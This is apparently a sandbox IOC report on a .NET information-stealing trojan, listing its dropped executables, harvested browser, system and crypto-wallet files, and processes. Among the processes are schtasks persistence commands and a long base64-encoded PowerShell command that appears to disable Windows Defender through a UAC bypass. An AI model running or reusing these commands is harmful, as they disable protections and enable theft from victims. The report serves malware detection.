IOC Report
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Client.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\Infected.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\WinDefend.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Loaader.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Loader.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_d0dade14ed85bb72d26ae77e109bbc7dc756ccbd_49c2e667_518c2b53-7995-485b-ba50-7e6c2e78dcc7\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3812.tmp.dmp
Mini DuMP crash report, 16 streams, Thu May 23 13:34:13 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CA7.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D25.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\Public\SSSS.log
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Infected.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loaader.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0osdllb4.hoj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31rlszfp.fxe.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4u3dcdzg.usd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecaiejov.gkf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ez5ghfow.v2o.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hped3tno.xxs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqn0ny0z.atb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfe5zsne.wim.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\ce3ed400-d1e84918ad678b08d2a369a3-Latest.log
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\tmp5D77.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmp5DD6.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmp5DD7.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmp5DE8.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmp5E08.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmp5E28.tmp.dat
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\tmp5F43.tmp.dat
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmp5FC1.tmp.dat
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\tmpA77.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\tmpAA25.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpAB7.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
modified
C:\Users\user\AppData\Local\Temp\tmpABDC.tmp.dat
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\DotNetZip-zvrymdq1.tmp
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH.zip (copy)
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Browsers\Mozilla\Firefox\Bookmarks.txt
ASCII text
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Browsers\Mozilla\Firefox\History.txt
Unicode text, UTF-8 text
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Directories\OneDrive.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Directories\Startup.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Desktop.jpg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Info.txt
ASCII text
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Process.txt
ASCII text
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\ProductKey.txt
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Windows.txt
ASCII text
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Wallets\Edge_Wallet\Edge_Exodus\CURRENT
ASCII text
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Wallets\Edge_Wallet\Edge_Exodus\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Wallets\Edge_Wallet\Edge_Exodus\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Roaming\MyData\DataLogs.conf
ASCII text
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped
There are 49 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe"
malicious
C:\Users\user\AppData\Local\Temp\Client.exe
"C:\Users\user\AppData\Local\Temp\Client.exe"
malicious
C:\Users\user\AppData\Local\Temp\Infected.exe
"C:\Users\user\AppData\Local\Temp\Infected.exe"
malicious
C:\Users\user\AppData\Local\Temp\WinDefend.exe
"C:\Users\user\AppData\Local\Temp\WinDefend.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""
malicious
C:\Windows\System32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
malicious
C:\Windows\System32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
malicious
C:\Users\user\AppData\Roaming\Loaader.exe
C:\Users\user\AppData\Roaming\Loaader.exe
malicious
C:\Users\user\AppData\Roaming\Loader.exe
C:\Users\user\AppData\Roaming\Loader.exe
malicious
C:\Users\user\AppData\Roaming\Loader.exe
"C:\Users\user\AppData\Roaming\Loader.exe"
malicious
C:\Users\user\AppData\Roaming\Loaader.exe
"C:\Users\user\AppData\Roaming\Loaader.exe"
malicious
C:\Users\user\AppData\Local\Temp\WinDefend.exe
"C:\Users\user\AppData\Local\Temp\WinDefend.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0A